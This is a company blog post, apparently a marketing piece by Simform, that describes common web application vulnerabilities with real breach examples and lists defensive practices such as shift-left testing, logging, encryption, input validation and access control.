Web Application Security: Best Practices to stop Threats

Web applications have been on the rise on the back of improving internet speeds and higher internet penetration. They offer engaging digital experiences without the need to download heavy applications.

Businesses are scrambling to cash in on web apps as they become the preferred touchpoints of users. However, apart from customers and companies, web applications appeal to one more faction— cybercriminals.

Basic web application attacks have become the second most common pattern in hacking attempts and breaches, making web application security a serious concern. Most new web entities don’t have the required infrastructure to mitigate sophisticated cyber attacks, making them easy prey.

Furthermore, the coronavirus pandemic also contributed to the increase in the number of web application attacks. With substantial restrictions imposed on physical operations, a lot of businesses decided to improve their online presence and rolled out web applications. However, cybercrime followed soon after.

There was a massive 800% increase in web application attacks in the first half of 2020. As a web app owner, you should be concerned since these attacks were distributed across all industries.

You need to be aware of the consequences, methods, and prevention of web app attacks for successful web application development. This article will equip you with all of the relevant knowledge. But before we get into any of that, let’s start with developing a better understanding of web application security.

Web application security, more commonly known as Web AppSec, is the use of tools, strategies, and best practices to prevent web apps from failure when under attack. It also encompasses the prevention of loss of data and valuable information in case of attempted breaches.

Unfortunately, web app source codes are usually very complex, making it easier for vulnerabilities to go unattended. And with the volume and penetration of attacks on web apps going up, it’s only a matter of time when threat actors detect and leverage such vulnerabilities.

Latest web development trends suggest that 9 out of 10 web application users are susceptible to cyber-attacks. Despite such an alarming rate, companies don’t often pay enough attention to securing their web applications. For example, the Mossack Fonseca (MF) breach, popularly known as Panama Papers, happened because the law firm hosted the site on outdated software. While we don’t promote securing web applications for the sake of putting a veil on illicit activities, the dreadful consequences could’ve been easily avoided. 

Based on the kind of attack, the aftermath of a web application attack can be devastating for your business. Here are the possible outcomes of a cyber attack.

Loss of sensitive information

Gone are the days when the only idea of a cyber attack was a transfer of funds to random offshore accounts. Cybercriminals now realize that data is far more valuable. Sadly, some web app owners unknowingly make it easier for them to breach databases.

In 2020 alone, data breaches affected more than 155.8 million individuals. And that isn’t reassuring! Web applications often deal with sensitive user information. From email addresses to credit card numbers and passwords, attackers try to get their hands on any leverageable data.

VerticalScope lost more than 45 million records from its network of more than 1100 websites and forums. The records contained user IDs, email addresses, IP addresses, encrypted passwords, and more. The majority of these passwords had MD5 salting, which makes them easier to decrypt. Putting in more efforts with safer encryptions could’ve vastly reduced the impact of this attack.

Downtime and loss of revenue

While data is invaluable, time is of the essence. For companies relying on web applications for day-to-day operations, any downtime can incur heavy losses. For example, an hour of downtime costs $84,650 on average. That’s a massive number for any small or medium-sized business.

DDoS attacks are among the most commonly used to overwhelm a web application’s servers and force it into downtime. During this period, users won’t be able to access your services, and given the fragile patience of modern consumers, you can lose some valuable customers forever.

Loss of reputation

No one wants to engage with a business that isn’t serious about its web app security. A lot of companies get away with half-hearted security measures for their web applications. But the unfortunate ones who fall prey to attacks find it difficult to save their faces. News of a cyber attack often finds its way to the mainstream media, and the company’s reputation goes for a toss. The aftermath of it could be a significant reduction in share values and customers abandoning your business.

High cost of acting late

Once a company undergoes a web application attack, it needs to scramble to prevent any more attacks or losses. The first thing they need to do is to fix the vulnerability. And fixing vulnerabilities can be an expensive affair. You might have to rewrite huge parts of code again or get back to the drawing board to build a secure infrastructure for the web app. Then there are other expenses such as lawsuits from stakeholders. A report suggests that the average cost of a cyber attack is $1.1 million. And it’s easily fathomable given how destructive web application attacks can be.

Being penalized by monitoring agencies

The law requires companies to adhere to specific safety and security standards. If it’s found that a cyber attack occurred because of the absence of those measures, then the company can be heavily fined with possible imprisonment in the equation.

Some of the common laws and compliances regulating cybersecurity in the USA are the HIPAA act of 1996, GLBA of 1999, FISMA of 2002, CISA of 2015, and more. Under HIPAA, you can be fined up to $50,000 per record, whereas GLBA can lead to fines up to $100,000 for each violation.

Staying proactive is simply the best way to save yourself from such consequences of a web application attack. And to be able to do that, you need to be aware of the major threats to your web application. So let’s learn about some of them.

Here are the common web app security vulnerabilities that you should keep an eye out for.

Broken access control

Access control refers to the regulation of permissions so that users cannot access more than what they need. However, developers often leave some loopholes unattended, which can lead to unwarranted access to users. Bad actors often utilize broken access control to access sensitive information, modify data, delete data, or even perform restricted business functions.

Laxman Muthiyah discovered one such vulnerability in Facebook business pages. While Facebook allows third parties to post photos and statuses on user’s behalf, they can access or modify admin roles on pages. It makes sense as this keeps the user in complete control of their page at all times.

However, Laxman discovered that he could add anyone as a page admin with one simple request and modify and delete the page information. The new admin can easily make posts on the page’s behalf while the actual admin gets locked out of the page. Facebook rewarded Laxman $2500 under their bug bounty program, but the cost could’ve been exponentially more if any bad actors were to discover this vulnerability.

Security misconfiguration

Security misconfiguration is simply the failure to implement all the security measures needed to safeguard the web application. Moreover, an incorrect configuration that leaves some gaps in the web application’s security is also termed security misconfiguration.

A security misconfiguration can sabotage your web application in multiple ways and at different stages. For example, cybercriminals can gain control through network services, web servers, databases, custom code, installed machines, and so on.

Interestingly, multiple organizations over the years have failed to secure their Amazon S3 storage and subsequently paid the price. Australian Broadcasting Corporation (ABC) is one such organization. 1800 daily MySQL database backups containing all sorts of information such as email addresses, logins, hashed passwords, license requests, secret access keys, etc., were discovered online.

Later, when ABC  was informed about the data breach, they addressed the security misconfiguration almost immediately. However, the damage was done, and people had access to their two years’ worth of sensitive information.

Sound development practices and testing could’ve avoided the issue altogether. For instance, Simform has created a performant and scalable web application for International Hockey Federation (FIH) which also utilizes Amazon S3 storage.

With expert development strategies, we’ve kept the application free of any cybersecurity risks and enabled our clients to deliver a dynamic and robust application to their audiences worldwide.

Cross-site scripting (XSS)

When a malicious script is injected into the website, it is referred to as cross-site scripting. Bad actors generally use this method to send malicious codes to unsuspecting end users. The users often don’t have any means to verify or validate such malicious scripts, and therefore, end up exposing the sensitive information stored within the browser during that session.

A cross-site scripting flaw can happen anywhere within the web application where the app demands input from the user but generates output without validating it. Steam is a popular game distribution platform with more than 120 million registered users. The platform allows for buying games, interacting with other players, multiplayer gaming and much more.

In 2017, a cross-site scripting flaw was discovered on Steam pages allowing actors to embed HTML and JavaScript codes on Steam pages. Given the popularity and nature of Steam, the flaw could’ve been misused for phishing attacks and tricking gamers into draining their accounts.

Insecure direct object references

It is a web app security vulnerability in which the web application has an identifier for direct access to an internal implementation but comes with no additional controls to authenticate the access.

One of the most famous real-life cases of this vulnerability is the one that was found on Yahoo!. And Egyptian cybersecurity expert Ibrahim Rafaat unearthed a flaw that allowed him to potentially wipe off more than 1.5 million records from the Yahoo database

Rafaat checked what happens when he deletes his comment on Yahoo answers and soon discovered that he could delete comments from others with a few simple steps. Given Yahoo’s popularity at that time, it put him in a position to delete potentially millions of records. However, he reported the flaw to Yahoo and received a reward under their bug bounty program.

Cross-site request forgery

It is a web application vulnerability that leverages social engineering for tricking authenticated users into taking unwanted actions. The consequences of a cross-site request forgery include but are not limited to user account takeovers, fund transfers, and even entire web application takeover in some cases.

TikTok is a wildly popular video-sharing app home to more than a whopping 689 million users. Because of its raging popularity, TikTok drives a lot of revenue for successful content creators on the platform. It has also attracted a ton of businesses to advertise themselves on the platform and have millions of eyeballs on them.

However, the platform was recently discovered with a cross-site request forgery endpoint. A JavaScript payload which when injected into the URL parameter, would allow for a one-click takeover of any TikTok account.

These vulnerabilities merely scratch the surface regarding possible web application security vulnerabilities, and you can’t go hunting each one of them. Instead, it would be best if you focused on web application security best practices to stay out of harm’s way. 

Following all the best practices that will help you address many web development challenges when it comes to security. Let’s look at some of the strategies that your development team can implement for the same.

1. Implement shift left security in SDLC

In today’s modern era of software development, developers tend to prefer agile development methodologies. Hence, they heavily use the cloud, DevOps, containers, microservices, etc. But unfortunately, all these methodologies introduce too many distributed components into your IT ecosystem. So, you need to manage the threats and security vulnerabilities brought by them.

For that purpose, shift left security comes into the picture. It is the practice of moving the security checks as early and often in SDLC (Software Development Life Cycle) as a part of DevSecOps. This approach has numerous benefits, such as cost reduction, early problem identification, faster deployment and delivery, improved security framework, etc.

Shift-left security comprises activities such as:

• Using threat modeling
• Incorporating security considerations into design and development
• Testing code to identify security loopholes and rectify them before the final release

There are five most popular shift-left security tools:

• Static Application Security Testing (SAST): Structural testing with source code access. It helps you identify weaknesses that may lead to security vulnerabilities.
• Dynamic Application Security Testing (DAST): Specification-based testing while the application runs. It detects issues with requests, responses, interfaces, scripts, injections, authentication, and sessions.
• Software Composition Analysis (SCA): It’s also known as origin analysis and helps you analyze all the software components and libraries. It detects vulnerabilities and notifies users about any patches or updates available then.
• Interactive Application Security Testing (IAST): Combines static and dynamic approaches to conduct security testing based on pre-defined test cases.
• Application Security Testing as a Service (ASTaaS): The organization outsources the security testing procedure for its application. It combines penetration and API testing to get an accurate idea of security loopholes.

2. Incorporate auditing and logging

Logging and auditing are among the OWASP top 10 security vulnerabilities you must address. Unfortunately, no concrete data shows how much logs and audits can contribute to security breaches. However, as a CISO (Chief Information and Security Officer), you won’t take a chance and neglect even a small percentage of security concerns and try to address them.

Auditing and logging involve:

• Tracing logins and essential transactions
• Monitoring logs for unusual activity
• Creating an automatic alert on abnormal sequences

Proper logging ensures details of what happened, when, how it occurred, and its root causes. In addition, this analysis lets you know your products or applications’ security threats or vulnerabilities. For logging and auditing, you can rely on Linux Syslog, ELK stack, PaperTrail, etc. Logging helps you get into the thick of things in case of a breach. Moreover, you have a reference point through which threat identification and modeling become more effortless.

3. Avoid security misconfiguration

The modern web server provides you with plenty of options for robust management. However, it also creates a lot of confusion and sometimes can lead to security misconfigurations.

Here are some of the things that lead to security breaches:

• Having unnecessary open ports on the web server
• Not protecting the files or directories
• Using outdated security protocols
• Allowing digital certificates to expire
• Not removing default, temporary, or guest accounts
• Using old or obsolete software libraries

To avoid such mishaps, you should focus on having a well-documented server management process. All the people handling server management should strictly follow the steps defined in the document. Nowadays, web server allows granular control over resources and security. However, it creates a touchpoint for security threats if you can’t handle them. So, be extremely careful while configuring your web servers and take appropriate security measures.

4. Conduct a full-scale security audit

In today’s day and age, every day, a new security threat or vulnerability gets registered by security communities. Therefore, a regular security audit is the only way to ensure comprehensive security for your organization.

For objectivity, it is advisable to appoint a third-party testing team to conduct this audit. The third-party team has years of experience and knowledge about every security threat to provide you with a holistic picture of your security composure.

There are three types of security audits that you can conduct:

• Black Box Security Audit: It’s also called a ‘hacker style’ audit, where you only provide the URL of your website and ask the audit team to find security vulnerabilities.
• White Box Security Audit: Here, you provide essential information, including your source code about your website, to the audit team. The purpose is to check whether you’ve followed the security best practices in coding, server management, cloud, etc.
• Gray Box Security Audit: It’s a mix of black and white box audits where you provide some information about the website to the auditing team, but not all.

After choosing any of these approaches, the next step is to fix all the vulnerabilities. For that purpose, you can prioritize vulnerabilities based on their impact on your application’s working and start with the vulnerability that had the most impact.

5. Ensure data encryption

When someone visits a web application, they might share confidential information you need to protect from attackers. For that purpose, data encryption comes to the fore. You can encrypt your data in transit between the visitor’s browser and your server. Here, SSL/TSL has a significant role as it helps encrypt all communication with the help of HTTPS protocol.

Data encryption enables you to establish trust in your website visitors. It also allows for SEO, as Google loves websites with SSL certification and HTTPS. Moreover, the data stored in the database or server also needs encryption.

Here are a few best practices for data encryption:

• Encrypting sensitive data with the most robust possible algorithm available
• Investing in infrastructure-level security
• Implementing network firewalls
• Storing data in the password-protected database server

6. Security testing within CI/CD pipeline

Nowadays, developers rely on modern development philosophies like DevOps to ensure quick and robust delivery of products. For implementing DevOps into your software development life cycle, you take the assistance of CI/CD pipelines. If those pipelines are not secured, there will be a chance of security threats or vulnerabilities in your application.

Therefore, implement security testing within CI/CD pipelines to detect the security threat on the go. It will help you save a lot of time, money, and resources. Also, you can catch and rectify security threats before the product goes live in the production environment. Security automation tools, such as SonarQube, Fortify Webinspect, AWS Security service, etc., can help you.

7. Implement real-time security monitoring

While security audits can help you detect security threats or vulnerabilities, there needs to be more that allows you to protect your application 24*7. Real-time security monitoring can help you, and Web Application Firewall (WAF) is its best implementation.

WAF covers all the aspects related to real-time security monitoring for web applications. It helps you block malicious activities in your web application, such as SQL injections, XSS attacks, or bad bots trying to launch DDoS attacks. However, there are many situations where WAF ends up being a false positive, so you need an evolved version of WAF to deal with threats.

Application Security Management Platform (ASMP) or a Runtime Application Self-Protection (RASP) tool can help you. ASMP gets embedded into your web application and protects it from unknown threats in real time. It also monitors protocols like FTP, ICMP, SOAP, TCP, etc., for security. On the other hand, RASP runs on a web server and analyzes the behavior of your web
application. If it detects anything unusual, it will block that session immediately.

8. Validate all the inputs

Any interactive web application receives much input from users through requests/responses. As a CSO (Chief Security Officer), you should consider all the inputs hostile until proven otherwise. Have an input validation mechanism at various places to ensure the input website receive doesn’t contain any security vulnerabilities. It helps prevent corrupt data from entering your ecosystem and triggering malfunctions of any components.

Some input validations are as follows:

• Data value validation: Ensure parameters meet expected value ranges.
• Data format validation: Ensure proper format guideline gets followed for JSON or XML
• Data type validation: Ensure parameters are of the correct type: numeric, text, etc.

You should follow two approaches for input validation – syntactic and semantic. Syntactic validation enforces the correct syntax of information (SSN, birth date, currency, or whole numbers). Semantic validation enforces value correctness within a business context (the end date is greater than the start date, low price is less than the high price).

9. Use exception management

You should never display a generic message in case of failure. Showing system-generated error messages doesn’t add any value for end users and makes it easier for attackers to target a particular security loophole. Usually, exception handling comes in the case of a failure when you have to reply to a rejected operation.

With the help of exception handling, you can allow applications to fail safely. It also eliminates the attacking surface for hackers by not displaying a system-generated error. For example, a money withdrawal request in ATM would return a user-friendly message of ‘retry after some time’ in case of a failed transaction. It doesn’t display any error on the screen.

10. Enforce security hardening measures

Some components in your web application ecosystem require an extra layer of security. That’s what we call security hardening measures. Here are ways to enforce security hardening:

• Add content security policy: Content is the supreme king in the digital age. So, you need to protect it; for that purpose, vigorous content policy enforcement is vital. It prevents your content from any malicious infections and keeps them safe.
• Define maximum script execution time: Script execution time defines how long a specific script can run on a web server. Keep this execution time as low as possible, as it reduces the chance of any external attacks from hackers.
• Disable modules: You should disable modules or extensions on your web server that are not in use. It dramatically reduces the attack surface area and makes it difficult for hackers to exploit security vulnerabilities.

11. Utilize authentication and role-based access control

When dealing with web application development, try implementing authentication and account management practices like solid password enforcement, secure password recovery mechanisms, and multi-factor authentication.

Another thing you can consider is role-based access control by implementing the principle of least privileges. The goal here is to provide as few privileges to users as possible. For example, an average user should not have access to the admin panel and security configurations.

Define roles for various types of users in your ecosystem and define the level of privileges you want to grant them. It will help you reduce the attack surface and make it difficult for hackers to access sensitive data. Lastly, use techniques such as password expiration, account lock-outs, and SSL to prevent passwords and other sensitive information.

By now, you must’ve realized how critical it is to have a competent development team at your disposal to keep web application security issues at bay. They help you create sound web applications in the first place rather than having to patch security holes later.

Simform has been acting as an extended team for organizations worldwide and has provided them with advanced and sound products for more than a decade. Our seasoned developers continuously strive to keep themselves updated with cybersecurity developments and transfer this knowledge to your software builds.

On top of that, our clients can’t speak enough of our transparency and adherence to quality standards. We are the one-shot solution for all your security, quality, and budget-related woes regarding web application development. Feel free to reach out and get a free consultation on your future development needs.